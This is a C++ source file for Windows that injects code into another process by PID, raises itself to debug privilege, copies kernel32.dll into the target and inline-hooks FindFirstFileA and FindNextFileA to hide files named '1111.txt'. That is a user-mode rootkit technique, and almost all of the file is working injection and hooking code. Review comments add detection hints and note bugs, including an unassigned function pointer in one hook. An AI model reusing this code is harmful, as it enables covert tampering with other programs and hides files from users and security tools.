📄 inject.cpp
#include <winsock2.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <windows.h>
#include <malloc.h>
#include <stdio.h>
#include <Psapi.h>
#include <winsock2.h>
#include <Tlhelp32.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"user32")
#pragma comment(lib,"psapi")
#include <winbase.h>

// Bookkeeping for one DLL whose image is duplicated into the target process,
// so that a hooked export can still reach the untouched original code in the
// copy. Filled in by InitDll; the copy is consumed by hook_api when it computes
// the "original function" address it patches into the hook.
typedef struct
{
	HMODULE		hModule;       // module handle of the DLL as loaded in THIS process (GetModuleHandle)
	LPVOID		lpNewBaseOfDll;// base of the copy of the DLL image allocated in the target process
	MODULEINFO	modinfo;       // MODULEINFO (lpBaseOfDll / SizeOfImage) of the DLL in this process
}DLLINFO, *PDLLINFO;

#pragma comment (lib,"Advapi32.lib")



// Copy the image of an already-loaded DLL into the target process.
//
// pszDll     name of a DLL that is loaded in THIS process (looked up with
//            GetModuleHandle, so the injector itself must have it mapped).
// pDllInfo   receives the local module handle, its MODULEINFO and the base of
//            the copy allocated in the target process.
// prochandle handle to the target process (main opens it with PROCESS_ALL_ACCESS).
//
// Returns 1 on success, 0 after printing a message on the first failing
// Windows call. The copy is what hook_api later points the hook at as the
// "original" function, so the patched export keeps working.
//
// NOTE(review): modinfo.lpBaseOfDll is a local address but is handed to
// ReadProcessMemory as a remote one, i.e. the DLL is assumed to be mapped at
// the same base in both processes (the author states the same assumption in
// hook_api). malloc's result is neither checked nor freed, and the return
// values of ReadProcessMemory / WriteProcessMemory are ignored. From a
// detection standpoint, VirtualAllocEx with PAGE_EXECUTE_READWRITE followed by
// WriteProcessMemory into another process is exactly the pattern that
// process-injection rules key on.
BOOL InitDll(char *pszDll, PDLLINFO pDllInfo,HANDLE prochandle)
{
	pDllInfo->hModule = GetModuleHandle(pszDll);// handle of the target DLL; this is local information, so this program itself must have the DLL loaded
	if(!pDllInfo->hModule)
	{
		printf("pDllInfo->hModule is null! in InitDll");
		return 0;
	}
	if(!GetModuleInformation(GetCurrentProcess(), pDllInfo->hModule, &pDllInfo->modinfo, sizeof(MODULEINFO)))// base address and image size of the target DLL (queried in this process)
	{
		printf("Error:GetModuleInformation in InitDll");
		return 0;
	}
	pDllInfo->lpNewBaseOfDll = VirtualAllocEx(prochandle,0,pDllInfo->modinfo.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);// reserve space for the copy in the target process, execute + read/write
	if(!pDllInfo->lpNewBaseOfDll)
	{
		printf("Error:VirtualAllocEx in InitDll");// error handling
		return 0;
	}
	BYTE * buffer=(BYTE *)malloc(pDllInfo->modinfo.SizeOfImage);// staging buffer large enough for the whole DLL image (never freed, result unchecked)
	ReadProcessMemory(prochandle,pDllInfo->modinfo.lpBaseOfDll,buffer,pDllInfo->modinfo.SizeOfImage,0);// read the DLL image out of the remote process (local base reused as remote address)
	WriteProcessMemory(prochandle,pDllInfo->lpNewBaseOfDll,buffer,pDllInfo->modinfo.SizeOfImage,0);// write it back into the freshly allocated copy
	return 1;
}

// Replacement for FindNextFileA. hook_api copies 500 bytes starting at this
// function's entry into the target process, so the code runs in a foreign
// address space with no usable imports or relocations and resolves everything
// by hand. The two initialised locals are placeholders: their immediates in
// the compiled prologue are presumably what hook_api overwrites at offsets 11
// and 18 of the copy (the backup-copy address of the original API, and the
// address of GetProcAddress). Any change to the prologue moves those offsets.
//
// Behaviour as written: call the original FindNextFileA, then, while the
// returned cFileName begins with the 8 bytes "1111.txt", call FindNextFileA
// again to skip that entry. Only the first 8 bytes are compared, so any name
// with that prefix matches.
//
// NOTE(review): `findnext` is never assigned in this function (compare
// hook_FindFirstFileA, which resolves it), and the skip loop pushes `myret`
// (an uninitialised bool) in the position of the search handle, so the skip
// path here does not look well-formed. A file-name-filtering hook on the
// Find* APIs is the classic user-mode rootkit signature; comparing a
// process's kernel32 export prologues with the on-disk image exposes the
// patched entry.
BOOL __stdcall hook_FindNextFileA(HANDLE find,PWIN32_FIND_DATA data)
{
	//__asm NOP// author's note: if the block that resolves the kernel32.dll base were removed, this NOP would have to be uncommented; without that block the compiled prologue lacks one `push esi`, and one byte must be added so that the `oldproc` immediate still sits where hook_api overwrites it.
	int oldproc=0x11223344;// placeholder: address of the original API inside the backup copy (patched by hook_api)
	int Getproc=0x11111111;// placeholder: address of GetProcAddress (patched by hook_api)
	int keraddr;
	int findnext;// NOTE(review): never assigned in this function
	int Geterror;
	bool myret;
	__asm
	{
		mov eax,fs:0x30
		mov eax,[eax+0x0c]
		mov esi,[eax+0x1c]
		lodsd
		mov eax,[eax + 0x08]
		mov keraddr,eax // walk the PEB loader list to obtain the kernel32.dll base address
	}
	__asm
	{
		push 0x00000000
		push 0x726f7272
		push 0x45747361
		push 0x4c746547 // build the string "GetLastError" on the stack
		push esp
		push keraddr
		call Getproc
		mov Geterror,eax // address of GetLastError
	}
	int temp;
	__asm
	{
		push data
		push find
		mov eax,oldproc
		call eax // call the original FindNextFileA via the backup copy
		mov temp,eax
	}
	char * myname=data->cFileName;
	__asm
	{
first:
		mov eax,myname
		mov ebx,0x31313131
		cmp [eax],ebx
		jne myno
		mov eax,myname
		mov ebx,0x7478742e
		cmp [eax+4],ebx
		jne myno // compare the first 8 bytes of cFileName with "1111.txt"
	    
		push data
		push myret // NOTE(review): pushes the uninitialised bool, not the search handle
		mov ebx,findnext
		call ebx // if it matched, call FindNextFileA to move on to the next entry
		mov temp,eax
		mov ebx,ERROR_NO_MORE_FILES
		call Geterror
		cmp eax,ebx
		jne first // stop once the enumeration is exhausted, otherwise re-check the new name
myno:
		NOP
	}
	myret=(bool)temp;


return myret;
}

// Replacement for FindFirstFileA, copied byte-for-byte into the target process
// by hook_api (500 bytes from its entry). Like hook_FindNextFileA it runs
// without imports or relocations and resolves kernel32.dll, FindNextFileA and
// GetLastError by hand; the two initialised locals are placeholders whose
// immediates hook_api presumably overwrites at offsets 11 and 18 of the copy.
// The prologue layout therefore must not change.
//
// Behaviour as written: call the original FindFirstFileA, then, while the
// returned cFileName begins with the 8 bytes "1111.txt", call FindNextFileA on
// the returned handle to skip that entry. Only the first 8 bytes are compared.
// The search handle from the original call is returned in every case.
//
// NOTE(review): the return value of the FindNextFileA calls is never stored,
// and `ebx` is relied on to survive the GetLastError call (callee-saved under
// the Windows x86 ABI). The prologue-overwrite of FindFirstFileA in the target
// is what an export-integrity check (in-memory prologue vs. on-disk image)
// would flag.
HANDLE __stdcall hook_FindFirstFileA(LPCTSTR find,LPWIN32_FIND_DATA data)
{
	int oldproc=0x11223344;// placeholder: address of the original API inside the backup copy (patched by hook_api)
	int Getproc=0xffbbaadd;// placeholder: address of GetProcAddress (patched by hook_api)
	int keraddr;
	int findnext;
	int Geterror;
	__asm
	{
		mov eax,fs:0x30
		mov eax,[eax+0x0c]
		mov esi,[eax+0x1c]
		lodsd
		mov eax,[eax + 0x08]
		mov keraddr,eax // walk the PEB loader list to obtain the kernel32.dll base address
	}
	__asm
	{
		push 0x00000041
		push 0x656c6946
		push 0x7478654e
		push 0x646e6946 // build the string "FindNextFileA" on the stack
		push esp
		push keraddr
		call Getproc
		mov findnext,eax // address of FindNextFileA
		push 0x00000000
		push 0x726f7272
		push 0x45747361
		push 0x4c746547 // build the string "GetLastError" on the stack
		push esp
		push keraddr
		call Getproc
		mov Geterror,eax // address of GetLastError
	}
	HANDLE myret;
	__asm
	{
		push data
		push find
		mov edx,oldproc
		call edx // call the original FindFirstFileA via the backup copy
		mov myret,eax
	}
	char * myname=data->cFileName;// name of the entry that was found
	__asm
	{
first:
		mov eax,myname
		mov ebx,0x31313131
		cmp [eax],ebx
		jne myno
		mov eax,myname
		mov ebx,0x7478742e
		cmp [eax+4],ebx
		jne myno // compare the first 8 bytes of cFileName with "1111.txt"
	    
		push data
		push myret
		mov ebx,findnext
		call ebx // if it matched, call FindNextFileA(myret, data) to move on to the next entry
		mov ebx,ERROR_NO_MORE_FILES
		call Geterror
		cmp eax,ebx
		jne first // stop once the enumeration is exhausted, otherwise re-check the new name
myno:
		NOP
	}
return myret;
}


// Redirect one export of the backed-up DLL inside the target process.
//
// pDllInfo   DLL info filled in by InitDll (local handle + remote copy base).
// name       export name, resolved locally with GetProcAddress; the author
//            assumes the export has the same address in every process.
// hackfunc   address of the replacement function in THIS process; 500 bytes
//            from it are copied into freshly allocated RWX memory in the target.
// pNewFunc   receives the address of the original function inside the remote
//            backup copy (same offset, rebased from lpBaseOfDll to lpNewBaseOfDll).
// prochandle target process handle.
//
// Returns 1 on success, 0 (after printing a message) when GetProcAddress,
// VirtualQueryEx or VirtualProtectEx fails.
//
// Writes performed in the target process:
//   - at the export's entry: B8 <funcaddr> FF E0 (mov eax,funcaddr / jmp eax),
//     7 bytes that clobber the original prologue;
//   - at funcaddr+11: *pNewFunc; at funcaddr+18: the local GetProcAddress
//     address. These offsets are tied to the exact compiled prologue of the
//     hook functions (their `oldproc` / `Getproc` initialisers), so a compiler
//     or flag change silently breaks the patch.
//
// NOTE(review): VirtualAllocEx's result is used without a NULL check, the page
// protection changed by VirtualProtectEx is never restored, the copy assumes
// the hook function fits in 500 bytes, and every WriteProcessMemory return
// value is ignored. The 7-byte entry overwrite is an inline hook; comparing a
// process's kernel32 export prologues against the on-disk image reveals it.
int hook_api(PDLLINFO pDllInfo, char *name, DWORD hackfunc, DWORD *pNewFunc,HANDLE prochandle)
{
	DWORD						dw, dwOrigFunc;
	MEMORY_BASIC_INFORMATION	mbi;

	dwOrigFunc = (DWORD)GetProcAddress(pDllInfo->hModule, name);// address of the target API; the author assumes it is identical in every process, so the local one is used
	if(dwOrigFunc == NULL)
	{
		printf("Error:GetProcAddress in hook_api");// error handling
		return 0;
	}

	if(!VirtualQueryEx(prochandle,(void *)dwOrigFunc,&mbi,sizeof(MEMORY_BASIC_INFORMATION)))// region information for the page holding the API in the target
	{
		printf("Error:VirtualQueryEx in hook_api");
		return 0;
	}

	if(!VirtualProtectEx(prochandle,mbi.BaseAddress,mbi.RegionSize,PAGE_EXECUTE_READWRITE,&dw))// make the whole region writable and executable (old protection in dw is never restored)
	{
		printf("Error:VirtualProtectEx in hook_api");
		return 0;
	}
	LPVOID funcaddr=VirtualAllocEx(prochandle,0,500,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);// RWX block in the target that will hold the copied hook function (result unchecked)

	WriteProcessMemory(prochandle,funcaddr,(void *)hackfunc/*func*/,500,0);// copy 500 bytes of the hook function's code verbatim
	// address of the original function inside the backup copy made by InitDll
	*pNewFunc = dwOrigFunc - (DWORD)pDllInfo->modinfo.lpBaseOfDll + (DWORD)pDllInfo->lpNewBaseOfDll;
	// overwrite the entry of the original function with a jump to the copied hook
	BYTE b8=0xb8;// opcode of mov eax,imm32
	WriteProcessMemory(prochandle,(LPVOID)dwOrigFunc,&b8,1,0);
	WriteProcessMemory(prochandle,(LPVOID)(dwOrigFunc+1),&funcaddr,4,0);// imm32 = funcaddr
	BYTE e0ff[2]={0xFF,0xE0};// jmp eax
	WriteProcessMemory(prochandle,(LPVOID)(dwOrigFunc+5),&e0ff,2,0);
	DWORD temp=*pNewFunc;
	WriteProcessMemory(prochandle,(LPVOID)((DWORD)funcaddr+11),&temp,4,0);// patch the hook's `oldproc` placeholder with the backup-copy address of the API
	temp=(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
	WriteProcessMemory(prochandle,(LPVOID)((DWORD)funcaddr+18),&temp,4,0);// patch the hook's `Getproc` placeholder with the (local) GetProcAddress address
	printf("func:%x,old:%x,new:%x\n",funcaddr,dwOrigFunc,*pNewFunc);// debug output (pointer printed with %x)

	return 1;
}

// Enable SeDebugPrivilege on the current process token so OpenProcess with
// PROCESS_ALL_ACCESS can succeed on other users' processes.
//
// NOTE(review): none of OpenProcessToken, LookupPrivilegeValue or
// AdjustTokenPrivileges is checked (AdjustTokenPrivileges can return TRUE
// while setting ERROR_NOT_ALL_ASSIGNED), and the token handle is never closed.
// Enabling SeDebugPrivilege from an ordinary program is itself an auditable
// event (privilege-use auditing).
void UpToDebug()// adjust the token to obtain the debug privilege
{
	HANDLE token;
	OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&token);
	TOKEN_PRIVILEGES tp;
	tp.PrivilegeCount =1;
	LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
	tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
	AdjustTokenPrivileges(token,0,&tp,sizeof(tp),0,0);
}

// Entry point: argv[1] is the PID of the target process. Enables
// SeDebugPrivilege, opens the process with full access, copies kernel32.dll
// into it and redirects FindFirstFileA / FindNextFileA to the hook functions.
//
// NOTE(review): argc is not checked before argv[1] is read, atoi gives no
// error indication, the OpenProcess handle is neither checked nor closed, the
// return values of both hook_api calls are ignored, and `void main` is an MSVC
// extension rather than standard C/C++. The variable named user32_dll actually
// describes kernel32.dll, and new_FindFirstFileA is reused as the out-parameter
// of the second hook_api call, so its first value is overwritten.
void main(int argc, char **argv)
{

	UpToDebug();// obtain the debug privilege

	HANDLE inhandle=OpenProcess(PROCESS_ALL_ACCESS,1,(DWORD)atoi(argv[1]));// open the target process (argv[1] unchecked)

	DLLINFO user32_dll;// despite the name, this describes kernel32.dll
	if(!InitDll("kernel32.dll",&user32_dll,inhandle)) return;// copy the target DLL into the process
	DWORD new_FindFirstFileA;
	hook_api(&user32_dll, "FindFirstFileA", (DWORD)hook_FindFirstFileA, &new_FindFirstFileA,inhandle);// install the hooks
	hook_api(&user32_dll, "FindNextFileA", (DWORD)hook_FindNextFileA, &new_FindFirstFileA,inhandle);// same out-variable reused; first value is overwritten
    return;
}
